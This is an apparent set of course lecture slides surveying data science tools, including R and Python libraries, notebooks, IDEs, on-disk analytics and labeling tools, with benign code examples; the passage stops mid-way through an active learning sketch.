Advanced Analytics in Business [D0S07a] Big Data Platforms & Technologies [D0S06a] Data Science Tools Overview
In-memory analytics
Python and R
Visualization
The road to big data
Notebooks and development environments
Labeling
File formats
Packaging and versioning systems
Model deployment
2 In-memory Analytics
3 https://mattturck.com/data2020/
4 Many tools and vendors
For experimentation and model development: hyperparameter tuning, logging, autoML
For visualization
For labeling
For data: Hadoop, Spark, streaming data, feature stores, cloud data warehouses, different storage formats
For deployment: different environments, pipelines
For monitoring and maintenance
5 Heard about Hadoop? Spark? H2O?
Many vendors with their “big data and analytics” stack
Vendors: Amazon, Cloudera, Datameer, DataStax, Dell, Oracle, IBM, MapR, Pentaho, Databricks, Microsoft, Hortonworks, EMC2
“My data lake versus yours”
There’s always “roll your own”
Open source, or walled garden?
Support, features, speed of upgrades?
The situation has stabilized a bit (i.e. the champions have settled), but does it matter?
6 Two sides emerge
Infrastructure
Big Data Integration Architecture NoSQL and NewSQL Streaming AI and ML ops
7 Two sides emerge
Analytics
Data Science Machine Learning AI NLP But also still: BI and Visualization
8 There’s a difference
9 In-memory analytics
Your data set fits in memory
  The assumption of many tools
  SAS, SPSS, MATLAB
  R, Python, Julia
Is this really a problem?
  Servers with 512GB of RAM have become relatively cheap
  Cheaper than an HDFS cluster (especially in today’s cloud environment)
  Implementation makes a difference (representation of data set in memory)
  If your task is unsupervised or supervised modeling, you can apply sampling
  Some algorithms can work in online / batch mode
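The sampling option above can be sketched with reservoir sampling, which draws a fixed-size uniform sample from a stream without ever holding the full data set in memory. This is a minimal illustration, not a method prescribed by the slides: the function name `reservoir_sample`, the generated `rows`, and the sample size are all assumptions.

```python
import random

def reservoir_sample(stream, k, seed=None):
    """Return k items chosen uniformly at random from an iterable of unknown length."""
    rng = random.Random(seed)
    reservoir = []
    for index, item in enumerate(stream):
        if index < k:
            # Fill the reservoir with the first k items
            reservoir.append(item)
        else:
            # Keep the new item with probability k / (index + 1)
            slot = rng.randint(0, index)
            if slot < k:
                reservoir[slot] = item
    return reservoir

# Stand-in for lines read lazily from a file that does not fit in memory
rows = (f"row-{i}" for i in range(100_000))
sample = reservoir_sample(rows, k=1000, seed=42)
```

Only the `k` sampled rows are ever kept, so the same loop works on a file object or a database cursor.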
10 Python and R
11 The big two
The “big two” in modern data science: Python and R
  Both have their advantages
  Others are interesting too (e.g. Julia), but still less adopted
  Vendors such as SAS and SPSS remain as well
  But bleeding-edge algorithms or techniques are found in open source first
Not (really) due to the language itself
  The language is just an interface
  Thanks to their huge ecosystem: many packages for data science available
  “Python is the second best language for everything”
Add-on packages/libraries, which typically aim to:
  Work with higher order arrays (tensors) and apply operations (typically with broadcasting support)
    Inspired by early array languages such as Ada, APL, FORTRAN, …
  This then typically forms the basis to provide support for data frames and “wrangling” them
    E.g. a 2-dimensional matrix where each column can have a different type, together with sort/filter/aggregation functions
  Which is then used to construct feature matrices to perform un/supervised learning on
    Using the predictive techniques we’ve seen earlier
  As well as some techniques to plot and visualize results
12 Analytics with R
Native concept of a “data frame”: a table in which each column contains measurements on one variable, and each row contains one case Unlike a matrix, the data you store in the columns of a data frame can be of various types I.e., one column might be a numeric variable, another might be a factor, and a third might be a character variable. All columns have to be the same length (contain the same number of data items, although some of those data items may be missing values)
Fun read: Is a Dataframe Just a Table?, Yifan Wu, 2019
13 Analytics with R
Hadley Wickham
  Chief Scientist at RStudio, and an Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University
Data Science “tidyverse” (https://www.tidyverse.org/)
  ggplot2 for visualizing data
  dplyr for manipulating data
  tidyr for tidying data
  stringr for working with strings
  lubridate for working with date/times
Data Import
  readr for reading .csv and fwf files
  readxl for reading .xls and .xlsx files
  haven for SAS, SPSS, and Stata files (also: foreign package)
  httr for talking to web APIs
  rvest for scraping websites
  xml2 for importing XML files
14 Modern R
Learning R today? Make sure to use “modern R” principles
tidyverse should be the first package you install
Especially thanks to dplyr , tidyr , stringr , and lubridate
dplyr implements a verb-based data manipulation language
  Works on normal data frames but can also work with database connections (already a simple way to solve the mid-to-big sized data issue)
  Verbs can be piped together, similar to a Unix pipe operator
flights %>% select(year, month, day) %>% arrange(desc(year)) %>% head
15 Modern R
delay <- flights %>%
  group_by(tailnum) %>%
  summarise(count = n(),
            dist = mean(distance, na.rm = TRUE),
            delay = mean(arr_delay, na.rm = TRUE))

delay %>%
  filter(count > 20, dist < 2000) %>%
  ggplot(aes(dist, delay)) +
  geom_point(aes(size = count), alpha = 1/2) +
  geom_smooth() +
  scale_size_area()
Also see: https://www.rstudio.com/resources/cheatsheets/
16 Modeling with R
Virtually any unsupervised or supervised algorithm is implemented in R as a package
The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process for creating predictive models. The package contains tools for:
  Data splitting
  Pre-processing
  Feature selection
  Model tuning using resampling
  Variable importance estimation
Caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface
  You can just use the original package as well if you know what you want
Still widely used
17 Modeling with R
require(caret)
require(ggplot2)
require(randomForest)

training <- read.csv("train.csv", na.strings=c("NA",""))
test <- read.csv("test.csv", na.strings=c("NA",""))

# Invoke caret with random forest and 5-fold cross validation
rf_model <- train(TARGET~., data=training, method="rf",
                  trControl=trainControl(method="cv", number=5),
                  ntree=500) # Other parameters can be passed here

print(rf_model)
## Random Forest
##
## 5889 samples
## 53 predictors
## 5 classes: 'A', 'B', 'C', 'D', 'E'
##
## Resampling: Cross-Validated (5 fold)
##
## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712
##
## Resampling results across tuning parameters:
##   mtry  Accuracy  Kappa  Accuracy SD  Kappa SD
##    2    1         1      0.006        0.008
##   27    1         1      0.005        0.006
##   53    1         1      0.006        0.007
##
## Accuracy was used to select the optimal model using the largest value.
## The final value used for the model was mtry = 27.
18 Modeling with R
print(rf_model$finalModel)
## Call:
## randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE,
##     allowParallel = TRUE)
## Type of random forest: classification
## Number of trees: 500
## No. of variables tried at each split: 27
##
## OOB estimate of error rate: 0.88%
##
## Confusion matrix:
##      A    B    C   D    E class.error
## A 1674    0    0   0    0     0.00000
## B   11 1119    9   1    0     0.01842
## C    0   11 1015   1    0     0.01168
## D    0    2   10 952    1     0.01347
## E    0    1    0   5 1077     0.00554
19 Modeling with R
The mlr package is an alternative to caret
R does not define a standardized interface for all its machine learning algorithms
The mlr package provides infrastructure so that you can focus on your experiments
The framework provides supervised methods like classification, regression and survival analysis along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering
The package is connected to the OpenML R package and its online platform, which supports collaborative machine learning online and makes it easy to share datasets as well as machine learning tasks, algorithms and experiments in order to support reproducible research
mlr3 : https://mlr3.mlr-org.com/
Newer, though gaining uptake
20 Modeling with R
library(mlr3)
set.seed(1)

task_iris = TaskClassif$new(id = "iris", backend = iris, target = "Species")
learner = lrn("classif.rpart", cp = 0.01)

train_set = sample(task_iris$nrow, 0.8 * task_iris$nrow)
test_set = setdiff(seq_len(task_iris$nrow), train_set)

# train the model
learner$train(task_iris, row_ids = train_set)

# predict data
prediction = learner$predict(task_iris, row_ids = test_set)

# calculate performance
prediction$confusion

##             truth
## response     setosa versicolor virginica
##   setosa         11          0         0
##   versicolor      0         12         1
##   virginica       0          0         6

measure = msr("classif.acc")
prediction$score(measure)

## classif.acc
##   0.9666667
21 Modeling with R
The modelr package provides functions that help you create elegant pipelines when modelling
By Hadley Wickham
Mainly for simple regression models
More information: http://r4ds.had.co.nz/
  Modern R approach
  Starts simple: linear and visual models
  Good introduction
22 Visualizations with R
ggplot2 reigns supreme
  By Hadley Wickham
  Uses a “grammar of graphics” approach
  A grammar of graphics is a tool that enables us to concisely describe the components of a graphic
  An abstraction which makes thinking, reasoning and communicating graphics easier
  Such a grammar allows us to move beyond named graphics (e.g., the “scatterplot”) and gain insight into the deep structure that underlies statistical graphics
  Original idea: Wilkinson (2006)
ggvis : based on ggplot2 and built on top of vega (a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs)
  Also declaratively describes data graphics
  Different render targets
  Interactivity: interact in browser, phone, …
23 Visualizations with R
shiny : a web application framework for R
  Construct interactive dashboards
24 Other packages worth noting
janitor : tools for cleaning data
stringr : work with text
lubridate : work with times and dates
ROCR : make ROC and other curves (or verification, or pROC, or mltools)
MICE : handle missing data (or naniar)
ROSE : up/down sampling with SMOTE
forecast : time series analysis (or prophet)
leaflet : make maps
igraph : social network analysis
esquisse : drag and drop ggplot2 plot builder (Tableau-style, https://dreamrs.github.io/esquisse/)
assertr : assertions on data
25 Analytics with Python
Python itself is not a statistical / scientific language
SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering
NumPy is the fundamental package for scientific computing with Python
  A powerful N-dimensional array object, sophisticated (broadcasting) functions, tools for integrating C/C++ and Fortran code, useful linear algebra, …
  “Let’s make Python’s arrays fast”
pandas is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language
  Python’s “data frame”, uses NumPy
matplotlib : comprehensive 2d plotting
SciPy library: fundamental library for scientific computing
26 Analytics with Python
“When operating on two arrays, NumPy compares their shapes element-wise. It starts with the trailing dimensions, and works its way forward. Two dimensions are compatible when they are equal, or one of them is 1. Arrays do not need to have the same number of dimensions, they’re lined up in a trailing fashion. When either of the dimensions compared is one, the other is used. In other words, dimensions with size 1 are stretched or “copied” to match the other.”
Source: https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html

Image  (3d array): 256 x 256 x  3
Scale  (1d array): (1) x (1) x  3
Result (3d array): 256 x 256 x  3

A      (4d array):  8  x  1  x  6  x  1
B      (3d array): (1) x  7  x  1  x  5
Result (4d array):  8  x  7  x  6  x  5

Learning solid NumPy indexing and broadcasting is a superpower
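The two shape tables above can be reproduced directly in NumPy. The sketch below uses made-up array contents (ones and zeros) and adds one incompatible pair to show what happens when trailing dimensions do not match.

```python
import numpy as np

# Image (256 x 256 x 3) times a per-channel scale of shape (3,)
image = np.ones((256, 256, 3))
scale = np.array([0.5, 1.0, 2.0])      # treated as 1 x 1 x 3
scaled = image * scale                 # result shape: (256, 256, 3)

# A (8 x 1 x 6 x 1) combined with B (7 x 1 x 5)
a = np.zeros((8, 1, 6, 1))
b = np.zeros((7, 1, 5))                # treated as 1 x 7 x 1 x 5
result = a + b                         # result shape: (8, 7, 6, 5)

# Trailing dimensions 4 and 3 are neither equal nor 1, so this fails
try:
    np.zeros((3, 4)) + np.zeros((3,))
    compatible = True
except ValueError:
    compatible = False
```

No data is copied for the size-1 dimensions; NumPy only behaves as if they were stretched.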
27 Analytics with Python
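import pandas as pd
import numpy as np

# Assumed setup (not shown on the slide): six dates, four columns of random values
dates = pd.date_range('20130101', periods=6)
df = pd.DataFrame(np.random.randn(6, 4), index=dates, columns=list('ABCD'))

df.sort_values(by='B')

# Example output (values are random, so yours will differ)
                   A         B         C         D
2013-01-03 -0.861849 -2.104569 -0.494929  1.071804
2013-01-04  0.721555 -0.706771 -1.039575  0.271860
2013-01-01  0.469112 -0.282863 -1.509059 -1.135632
2013-01-02  1.212112 -0.173215  0.119209 -1.044236
2013-01-06 -0.673690  0.113648 -1.478427  0.524988
2013-01-05 -0.424972  0.567020  0.276232 -1.087401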
28 Analytics with Python
NumPy itself is clean and very well documented…
Pandas’ API is a bit of a mess
“Minimally Sufficient Pandas”: https://medium.com/dunder-data/minimally-sufficient-pandas-a8e67f2a2428
E.g. on the different ways to index:
.loc is primarily label based ( dataframe.loc['a'] ), but may also be used with a boolean array
.loc will raise KeyError when the items are not found
.iloc is primarily integer position based (from 0 to length-1 of the axis)
.ix supported mixed integer and label based access, but was deprecated in pandas 0.20 and removed in pandas 1.0
Similarly to .loc , .at provides label based scalar lookups, while .iat provides integer based lookups analogously to .iloc
Oh, and you can still do dataframe.a or dataframe['a']
If df is a sufficiently long DataFrame, then df[1:2] gives the second row, however, df[1] gives an error and df[[1]] gives the second column
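The indexers listed above can be compared side by side on a tiny frame. The column names, index labels and values here are made up for illustration; the sketch leaves out `.ix`, which current pandas no longer provides.

```python
import pandas as pd

df = pd.DataFrame(
    {"a": [10, 20, 30], "b": [1.5, 2.5, 3.5]},
    index=["x", "y", "z"],
)

row_by_label = df.loc["y"]          # label-based row lookup
row_by_position = df.iloc[1]        # position-based lookup of the same row
cell_by_label = df.at["y", "a"]     # scalar lookup by label
cell_by_position = df.iat[1, 0]     # scalar lookup by position
filtered = df.loc[df["a"] > 15]     # .loc with a boolean array
second_row = df[1:2]                # slicing with [] selects rows by position
column = df["a"]                    # [] with a label selects a column

# .loc raises KeyError for a label that does not exist
try:
    df.loc["missing"]
    missing_raises = False
except KeyError:
    missing_raises = True
```

Sticking to `.loc` and `.iloc` (plus `[]` for column selection) covers most needs and avoids the ambiguous cases.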
There are packages like dplython and pandas-ply, though not widely used
Pandas does have strong time-series operators, however
Situation is a bit better since https://pandas.pydata.org/docs/whatsnew/v1.0.0.html
29 Modeling with Python
Modeling offers a better picture
scikit-learn
  Simple and efficient tools for data mining and data analysis
  Accessible to everybody, and reusable in various contexts
  Built on NumPy, SciPy, and matplotlib
  Open source, commercially usable - BSD license
  Lots of algorithms implemented
  Relatively easy to implement your own algorithms
statsmodels
  Python library that provides classes and functions for the estimation of many different statistical models, as well as for conducting statistical tests, and statistical data exploration
30 Modeling with Python
from sklearn.datasets import load_iris
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import numpy as np

iris = load_iris()
df = pd.DataFrame(iris.data, columns=iris.feature_names)
# Randomly assign roughly 75% of the rows to the training set
df['is_train'] = np.random.uniform(0, 1, len(df)) <= .75
# pd.Factor no longer exists in pandas; Categorical.from_codes replaces it
df['species'] = pd.Categorical.from_codes(iris.target, iris.target_names)

train, test = df[df['is_train']], df[~df['is_train']]

features = df.columns[:4]
clf = RandomForestClassifier(n_jobs=2)
# Category codes line up with the positions in iris.target_names
y = train['species'].cat.codes
clf.fit(train[features], y)

preds = iris.target_names[clf.predict(test[features])]
pd.crosstab(test['species'], preds, rownames=['actual'], colnames=['preds'])
31 Modeling with Python
For some things you’ll have to look elsewhere
“scikit-learn tries to provide a unified API for the basic tasks in machine learning, with pipelines and meta-algorithms like grid search to tie everything together”
pystruct handles general structured learning
seqlearn handles sequence based learning
surprise or lightfm for recommender engines
statsmodels or prophet for time series
“Deep learning and reinforcement learning both require a rich vocabulary to define an architecture, with deep learning additionally requiring GPUs for efficient computing. However, neither of these fit within the design constraints of scikit-learn”
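The pipelines and grid search mentioned in the scikit-learn quote on this slide can be sketched as follows. The choice of scaler, model and parameter grid is an assumption made for illustration only; any estimator with the same fit/predict interface could be dropped in.

```python
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler

X, y = load_iris(return_X_y=True)

# A pipeline chains preprocessing and modeling behind a single fit/predict API
pipeline = Pipeline([
    ("scale", StandardScaler()),
    ("model", LogisticRegression(max_iter=1000)),
])

# Grid search is a meta-algorithm: it refits the whole pipeline per setting.
# Step parameters are addressed as <step name>__<parameter name>.
param_grid = {"model__C": [0.1, 1.0, 10.0]}
search = GridSearchCV(pipeline, param_grid, cv=5, scoring="accuracy")
search.fit(X, y)

best_c = search.best_params_["model__C"]
best_score = search.best_score_
```

Because the scaler sits inside the pipeline, it is refit on each training fold, which keeps information from the validation fold out of the preprocessing step.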
Basic CPU-based artificial neural networks are present, however
Some support to work with textual data though, i.e. many featurization options
32 Visualizations with Python
matplotlib : the foundation
seaborn : “if matplotlib ‘tries to make easy things easy and hard things possible,’ seaborn tries to make a well-defined set of hard things easy too”
ggplot : Python implementation of ggplot2. Not a “feature-for-feature port of ggplot2,” but there’s strong feature overlap
Altair : newer library with “pleasant API”
bokeh : similar
yellowbrick
Datashader : for massive amounts of data points
Older but fun comparison at: https://dansaber.wordpress.com/2016/10/02/a-dramatic-tour-through-pythons-data-visualization-landscape-including-ggplot-and-altair/
33 Other packages worth noting
imbalanced-learn : up/down sampling with SMOTE and friends
plotnine : another ggplot-style Python plotting tool
tqdm : human friendly progress bars
missingno : handle missing data
dateparser : handling dates in various formats
pyflux : time series analysis (or prophet, or tsfresh)
great_expectations : assertions on data
folium : mapping library
scikit.ml : multilabel techniques
pomegranate : probabilistic models
semisup-learn : semi-supervised models
And there are interop packages to work between R and Python as well (e.g. reticulate)
34 Visualization
35 Packaged software and BI
Apart from the libraries mentioned above, there’s also packaged (“business intelligence”) software
E.g. Tableau, Spotfire, PowerBI, Cognos, Qlikview, SAS Visual Analytics, …
  Just “use” the tool, no hassle of coding and debugging
  Ease-of-use
  Limited in functionality
  Custom design more difficult
  Has virtually nothing to do with modeling
36 Packaged software and BI
Niche visualization can require niche tools, though
Web analytics (Google, Adobe, SAS)
Process mining (Disco and friends)
Graph visualizations: Gephi, NodeXL, sigma.js, Cytoscape
Mapping (Leaflet, Folium, kepler.gl, others)
37 Further libraries to be aware of
d3.js : JavaScript library which made famous the concept of “data-driven” documents
  D3 allows you to bind arbitrary data to a Document Object Model (DOM), and then apply data-driven transformations to the document
  For example, you can use D3 to generate an HTML table from an array of numbers. Or, use the same data to create an interactive SVG bar chart with smooth transitions and interaction
  Direct coupling between data and visualization: changing the data changes the visualization
  See: https://github.com/mbostock/d3/wiki/Gallery, http://bl.ocks.org/, http://bl.ocks.org/mbostock and https://bost.ocks.org/mike/
Graphviz: diagram and graph visualizations (serves as the “engine” in many other tools)
Plotly: widely used charting library, with Plotly Dash (https://plot.ly/products/dash/) as a great dashboarding tool for Python (great shiny alternative)
38 The Road to Big Data
39 On-GPU analytics
GPU: graphics processing unit
Efficient for massively parallelizable operations (e.g. linear algebra, vector operations)
  Ecosystem mainly based on Python
  Hardware support mainly based on NVIDIA GPUs with the CUDA SDK
Training data can be very large (a million images, for instance), but not necessarily stored or handled in a distributed fashion
“Epoch”: one iteration of training
  For small data sets: exposing a learning algorithm to the entire set of training data (the “batch”)
  “Minibatch” means that the gradient is calculated across a sample before updating weights
  Can be done in-memory
Computation can be distributed, however: this often involves distribution over multiple GPUs, though these are different approaches from Hadoop and friends (e.g. Apache MXNet), and often comes with bottlenecks when used in a networked fashion (so “distributed” often happens by using multiple GPUs in one machine)
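The epoch and minibatch terms above can be made concrete with a small CPU-only sketch in NumPy. It fits a linear model by minibatch gradient descent; the synthetic data, learning rate, batch size and number of epochs are assumptions chosen so the example converges quickly, and no GPU is involved.

```python
import numpy as np

rng = np.random.default_rng(0)

# Synthetic regression data: y = X @ true_w + small noise
X = rng.normal(size=(1000, 3))
true_w = np.array([2.0, -1.0, 0.5])
y = X @ true_w + rng.normal(scale=0.01, size=1000)

w = np.zeros(3)
learning_rate = 0.1
batch_size = 32

for epoch in range(20):                      # one epoch = one pass over all rows
    order = rng.permutation(len(X))          # reshuffle the rows every epoch
    for start in range(0, len(X), batch_size):
        idx = order[start:start + batch_size]            # one minibatch
        error = X[idx] @ w - y[idx]
        gradient = 2 * X[idx].T @ error / len(idx)       # gradient of the mean squared error
        w -= learning_rate * gradient                    # update after each minibatch
```

Setting `batch_size = len(X)` turns this into full-batch gradient descent, with exactly one weight update per epoch.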
40 On-disk analytics
Even if your data set exceeds the boundaries of memory, there might be an easier way other than big-data oriented setups: the “intermediate” step before going full “big data”
Learn how to use your package correctly (e.g. apply methods instead of slow for loops!)
Use a database and SQL
Use a better memory representation (e.g. data.table in R)
Memory-mapped files (i.e. “disk-scratching”)
  ff or bigmemory in R (but not that fun)
  disk.frame : https://github.com/xiaodaigh/disk.frame
Dask in Python, similar API to pandas
Pandas on Ray (https://ray.readthedocs.io/en/latest/pandas_on_ray.html) is also popular, powerful when combined with modin (https://github.com/modin-project/modin) (“Modin is a DataFrame designed for datasets from 1KB to 1TB+”)
vaex (https://github.com/vaexio/vaex) (works with huge tabular data, processes more than a billion rows/second)
Dato (Turi) used to have a great implementation, now open source as SFrame (https://github.com/turi-code/SFrame) and in https://github.com/apple/turicreate
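The memory-mapped file idea from the list above can be sketched in Python with `numpy.memmap`. The file name, array size and chunk size are made up for illustration; the file is small enough to fit in memory here, but the same pattern applies to files that do not.

```python
import os
import tempfile

import numpy as np

n_values = 1_000_000
chunk_size = 100_000

with tempfile.TemporaryDirectory() as tmp_dir:
    path = os.path.join(tmp_dir, "values.dat")   # hypothetical file name

    # Write the values to disk through a writable memory map
    writer = np.memmap(path, dtype="float64", mode="w+", shape=(n_values,))
    writer[:] = np.arange(n_values)
    writer.flush()
    del writer

    # Re-open read-only: pages are loaded from disk only when accessed
    reader = np.memmap(path, dtype="float64", mode="r", shape=(n_values,))
    total = 0.0
    for start in range(0, n_values, chunk_size):
        # Only the current chunk needs to be resident in memory
        total += float(reader[start:start + chunk_size].sum())
    del reader
```

Libraries such as Dask and vaex build on the same principle, adding a data frame API and lazy evaluation on top.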
41 On-disk analytics
import pandas as pd
import dask.dataframe as dd

# pandas: a single file, evaluated eagerly
df = pd.read_csv('2015-01-01.csv')
df.groupby(df.user_id).value.mean()

# Dask: many files, evaluated lazily until .compute() is called
df = dd.read_csv('2015-*-*.csv')
df.groupby(df.user_id).value.mean().compute()

# SFrame (legacy GraphLab Create API)
import graphlab
import graphlab.aggregate as agg
sf = graphlab.SFrame.read_csv('2018-01-01.csv')
sf.groupby(key_columns='user_id', operations={'avg': agg.MEAN('value')})
Careful with this, though. You can end up with Pandas, Dask and Spark code in one spaghetti bowl
Nevertheless, most organizations that jumped on the Spark and co. bandwagon would have been better off taking a good look at the above
It could have been solved with a bunch of servers and a (distributed) on-disk library
Funny how most of these libraries have adopted the directed acyclic graph (DAG) computing approach initially “rediscovered” by Spark as a way to forego MapReduce, something we’ll talk about later
“Pandas is crashing because I’m trying to work with a 50GB data set” is not really an excuse
42 Notebooks and Development Environments
43 Notebooks
Scientific programming in data science is very much concerned with exploration, experimentation, making demos, collaborating, and sharing results
It is this need for experiments, explorations, and collaborations that is addressed by notebooks for scientific computing
  Notebooks are collaborative web-based environments for data exploration and visualization
  Similar to a “lab notebook”
The idea of computer notebooks has been around for a long time, starting with the early days of MATLAB and Mathematica in the mid-to-late-80s
  Later: SageMath and IPython
  Today: Jupyter
44 Notebooks
45 Notebooks
The Sage Notebook was released on 24 February 2005 by William Stein
  Professor of mathematics at the University of Washington
  Free and open source software (GNU License), with the initial goal of creating an “open source alternative to Magma, Maple, Mathematica, and MATLAB”
  Sage is based on Python and focuses on mathematical worksheets
The IPython console was started by Fernando Perez circa 2001
  From a first attempt to replicate a Mathematica Notebook with 259 lines of code
  With the Sage Notebook being a reference, Perez had many collaborations with the Sage team
In 2015, the IPython Notebook project became the Jupyter project
  The ability to go beyond Python and run several languages (“kernels”) in a notebook
  However, it is not possible to have multiple cells with multiple languages within the same notebook
  Impressive success and steady growth since 2011
46 Notebooks
47 Notebooks
Other alternatives:
Apache Zeppelin: similar in concept to Jupyter
  Apache Zeppelin is built on the JVM while Jupyter is built on Python
  Zeppelin offers the possibility to mix languages across cells
  Zeppelin is mainly oriented towards Spark
  Was originally implemented as the way forward by many Spark-based vendor stacks, though today Jupyter is the most popular environment, so most stacks have added, or continued to include, Jupyter
Beaker: designed from the start to be a fully polyglot notebook. Supports Python, Python3, R, Julia, JavaScript, SQL, Java, Clojure, HTML5, Node.js, C++, LaTeX, Ruby, Scala, Groovy, Kdb
  Nice idea of mixing languages in the same notebook, but has not really gone anywhere
nteract: for those of you that like to have Jupyter installed as a desktop app
  Includes easier ways for styling
observablehq.com
  The cool new kid on the block
  Heavily JS oriented
  See e.g. https://observablehq.com/@bmesuere
48 Notebooks
Jupyter comes with a lot of benefits
Quick iteration, immediate output shown in the notebook
Easy to construct “dynamic” reports, by applying your style sheets
You can even make them interactive (i.e. through the use of widgets, https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Basics.html)
Many extensions to adjust your workflow
“Jupyter Hub” to host a multi user Jupyter environment
E.g. Netflix uses papermill to directly execute and schedule Notebooks
  papermill is a tool for parameterizing, executing, and analyzing Jupyter Notebooks
  https://medium.com/netflix-techblog/scheduling-notebooks-348e6c14cfd6
  https://github.com/nteract/papermill
49 Notebooks
But come with a set of issues as well…
Version control can be problematic
  Jupyter stores notebooks as one big JSON file, including inputs and outputs
  Every time you make a change, you need to commit the whole file
Code can only be run block-by-block (cell by cell)
  Can easily mess up flow of code (non-linear execution)
  You end up with a notebook which has newer results above the older results
Code can end up looking fragmented
  People start splitting the chunks and forget to put them back together, lose track of the order of the analysis and it all ends up in a big mess
Does not encourage writing modular code
  You end up copying code fragments from older, other people’s notebooks
“Executing” a notebook can be difficult
  Reproducibility?
  Export to Python, R?
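The version control issue follows directly from the notebook file format. The sketch below builds a minimal notebook in the nbformat 4 JSON layout (the cell contents are made up) and strips outputs and execution counters before the file would be committed. The helper name `strip_outputs` is hypothetical; dedicated tools such as nbstripout do this more robustly.

```python
import json

# A minimal notebook in the nbformat 4 JSON layout (contents are made up)
notebook = {
    "nbformat": 4,
    "nbformat_minor": 5,
    "metadata": {},
    "cells": [
        {"cell_type": "markdown", "metadata": {}, "source": ["# Analysis"]},
        {
            "cell_type": "code",
            "metadata": {},
            "execution_count": 7,
            "source": ["print(1 + 1)"],
            "outputs": [
                {"output_type": "stream", "name": "stdout", "text": ["2\n"]}
            ],
        },
    ],
}

def strip_outputs(nb):
    """Return a copy of the notebook without outputs or execution counters."""
    cleaned = json.loads(json.dumps(nb))     # simple deep copy via JSON round trip
    for cell in cleaned["cells"]:
        if cell["cell_type"] == "code":
            cell["outputs"] = []
            cell["execution_count"] = None
    return cleaned

clean = strip_outputs(notebook)
serialized = json.dumps(clean, indent=1, sort_keys=True)
```

With outputs removed, a diff between two commits shows only changes to the code and markdown cells.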
50 Notebooks
https://docs.google.com/presentation/d/1n2RlMdmv1p25Xy5thJUhkKGvjtV-dkAIsUXP-AL4ffI/edit and https://yihui.name/en/2018/09/notebook-war/:
1. Hidden state and out-of-order execution
2. Notebooks are difficult for beginners
3. Notebooks encourage bad habits
4. Notebooks discourage modularity and testing
5. Jupyter’s autocomplete, linting, and way of looking up the help are awkward
6. Notebooks encourage bad processes
7. Notebooks hinder reproducible + extensible science
8. Notebooks make it hard to copy and paste into Slack/Github issues
9. Errors will always halt execution
10. Notebooks make it easy to teach poorly
11. Notebooks make it hard to teach well
51 Notebooks
https://colab.research.google.com
52 Notebooks
https://studio.azureml.net/
53 Notebooks
All cloud providers have realized that the best data science environment to offer is simply Python + Jupyter + the possibility to install packages
The issues can be solved:
Version control can be problematic
  Fixed in many hosted environments
  Possible to “roll your own”, e.g. through the use of “git hooks”
Code can only be run block-by-block (cell by cell)
  Enforce strict guidelines
Does not encourage writing modular code
  E.g. see https://github.com/fastai/nbdev
“Executing” a notebook can be difficult
  Solutions exist to overcome this as well, e.g. papermill
fast.ai has written a whole book using Jupyter
The takeaway? Notebooks are here to stay
  Great tool for exploration, experimentation, development phase of data science, even for showing results in “report” form
  But additional processes / skills / governance required
  If not: “throw it over the wall” projects
  E.g. the end-product of a data scientist should be a (collection of) notebook(s) which can, at any moment, (re)train the model, save and validate it
  Common code should be put in separate modules
“I like notebooks”
54 IDEs
Integrated development environment
Commonly offers much better debugging, code inspection, documentation capabilities
RStudio for R
  On desktop
  Or hosted on web server (commercial)
  Support for Git and others
  Authoring reports, slide shows
  Interactive visualizations
Spyder for Python
  Copies look and feel of RStudio
  Similar: Rodeo
Or IDEs such as PyCharm
Or Jupyter Lab
  Builds on top of Jupyter
  Adds panel layout, file view
55 IDEs
https://www.rstudio.com/
56 IDEs
https://www.jetbrains.com/pycharm/
57 IDEs
https://github.com/jupyterlab/jupyterlab
58 IDEs
https://code.visualstudio.com/
59 Getting started
Python
  Anaconda Distribution: https://www.continuum.io/downloads
  Includes Jupyter, Python, data science package repository (also for R)
R
  CRAN (base installation): https://cran.r-project.org/
  RStudio: https://www.rstudio.com/
  Or Jupyter
Hosted (“one click Jupyter”)
  Google Colab: https://colab.research.google.com (free)
  Azure ML Studio: https://studio.azureml.net/ (free)
  Kaggle Kernels: https://www.kaggle.com/kernels (free)
  http://paperspace.io/ and https://gradient.paperspace.com/
  https://www.floydhub.com/
  https://www.crestle.com/
  https://www.onepanel.io/
  https://www.easyaiforum.cn/ (易学智能)
  SageMaker, or AWS Google Compute Platform, EC2, DigitalOcean… and install yourself
60 Labeling
61 Labeling
Not so easy in real life…
62 Labeling
https://github.com/CrowdCurio/time-series-annotator
63 Labeling
https://github.com/SkalskiP/make-sense
64 Labeling
https://github.com/Labelbox/Labelbox
65 Labeling
https://github.com/NaturalIntelligence/imglab
66 Labeling
For different data types and tasks
Manual labelers can be hired as well
See https://github.com/heartexlabs/awesome-data-labeling for a good overview
Good tools will utilize active learning approaches to speed up the labeling
  Label some images
  Train a model
  Next, ask to label some images for which the model is unsure
Other approaches use a pretrained model to speed up the labeling
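The three active learning steps above can be sketched on a toy problem. Everything here is a stand-in chosen for illustration: the data are random numbers between 0 and 1 instead of images, the `oracle` function plays the human labeler (with a hypothetical rule of "positive above 0.6"), and the "model" is a single cut-off value. Real labeling tools use proper classifiers and their predicted probabilities.

```python
import random

random.seed(0)
pool = [random.random() for _ in range(200)]   # unlabeled 1-D data points

def oracle(x):
    """Stand-in for the human labeler (hypothetical rule: positive above 0.6)."""
    return x > 0.6

def fit_threshold(labeled):
    """Train a trivial model: a cut-off halfway between the two classes."""
    positives = [x for x, label in labeled.items() if label]
    negatives = [x for x, label in labeled.items() if not label]
    if not positives or not negatives:
        return 0.5
    return (min(positives) + max(negatives)) / 2

# Step 1: label a small, evenly spread seed set
labeled = {x: oracle(x) for x in sorted(pool)[::40]}

for _ in range(15):
    # Step 2: train a model on everything labeled so far
    threshold = fit_threshold(labeled)
    # Step 3: request a label for the point the model is least sure about,
    # here the unlabeled point closest to the current cut-off
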